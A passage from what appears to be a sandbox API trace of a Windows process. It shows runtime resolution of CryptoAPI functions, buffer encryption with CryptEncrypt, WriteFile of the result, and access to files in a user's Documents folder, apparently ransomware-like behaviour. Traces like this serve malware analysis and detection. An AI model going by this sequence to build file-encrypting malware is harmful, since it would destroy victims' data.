Flags=0x0, Size=0x4) returned 0x43e2ec0 [0082.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3698 [0082.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ea0 [0082.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2e20 [0082.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3710 [0082.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0082.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ea0 | out: hHeap=0x1780000) returned 1 [0082.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0082.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e20 | out: hHeap=0x1780000) returned 1 [0082.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2dd0 [0082.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3698 [0082.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2dc0 [0082.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0082.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2dc0 | out: hHeap=0x1780000) returned 1 [0082.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0082.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e60 | out: hHeap=0x1780000) returned 1 [0082.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0082.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ec8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0082.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0082.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0082.570] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0082.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0440 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d90 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2df0 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e70 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2db0 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e50 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2de0 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d02b0 | out: hHeap=0x1780000) returned 1 [0082.571] CryptGetKeyParam (in: hKey=0x41ac040, dwParam=0x7, pbData=0x43e2c10, pdwDataLen=0x144d900, dwFlags=0x0 | out: pbData=0x43e2c10*=0x6610, pdwDataLen=0x144d900*=0x4) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e30 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e60 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3938 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e30 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3980 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ea0 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c38c0 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3920 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e90 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3950 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3b00 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e00 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3ad0 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e80 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d30 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2da0 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ec0 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2dd0 | out: hHeap=0x1780000) returned 1 [0082.571] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0418 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3848 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36e0 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37d0 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35c0 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35d8 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3608 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.572] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0082.572] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e10 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.573] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e20 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2f00 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.573] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d70 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2dd0 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e00 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ee0 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2de0 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e40 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37d0 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d02d8 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41acec0 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0082.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3908 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e50 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3b48 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3ae8 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2dc0 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d03f0 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0620 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0418 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3608 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d02b0 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0082.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0082.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0082.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35f0 | out: hHeap=0x1780000) returned 1 [0082.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0082.575] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0082.575] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.575] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0082.579] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.579] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0082.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c3ae8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0082.579] CryptEncrypt (in: hKey=0x41ac040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144de30*=0x5570, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144de30*=0x5580) returned 1 [0082.579] CharLowerBuffW (in: lpsz="byte[21889]", cchLength=0xb | out: lpsz="byte[21889]") returned 0xb [0082.579] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.579] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0082.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c3ba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0082.580] CryptEncrypt (in: hKey=0x41ac040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49af588*, pdwDataLen=0x144de30*=0x5570, dwBufLen=0x5580 | out: pbData=0x49af588*, pdwDataLen=0x144de30*=0x5580) returned 1 [0082.580] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0082.580] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0082.580] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.580] WriteFile (in: hFile=0x258, lpBuffer=0x4402940*, nNumberOfBytesToWrite=0x5580, lpNumberOfBytesWritten=0x144e834, lpOverlapped=0x0 | out: lpBuffer=0x4402940*, lpNumberOfBytesWritten=0x144e834*=0x5580, lpOverlapped=0x0) returned 1 [0082.581] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0082.581] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.581] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0082.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43c3878, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0082.581] CryptDestroyKey (hKey=0x41ac040) returned 1 [0082.582] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0082.582] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0082.582] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.582] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0082.582] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0082.582] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.582] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.582] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0082.582] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0082.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797048, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0082.582] CryptReleaseContext (hProv=0x41a4948, dwFlags=0x0) returned 1 [0082.582] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.582] FreeLibrary (hLibModule=0x756e0000) returned 1 [0082.582] CloseHandle (hObject=0x298) returned 1 [0082.582] CloseHandle (hObject=0x258) returned 1 [0082.584] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\bVjgYdkDx.odt", nBufferLength=0x7fff, lpBuffer=0x143e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\bVjgYdkDx.odt", lpFilePart=0x0) returned 0x53 [0082.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9888 [0082.584] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\bVjgYdkDx.odt" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\bvjgydkdx.odt")) returned 0x20 [0082.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0082.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0082.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0082.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0082.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0082.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0082.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0082.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0082.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0082.584] RtlAllocateHeap (HeapHandle=0x1780000, 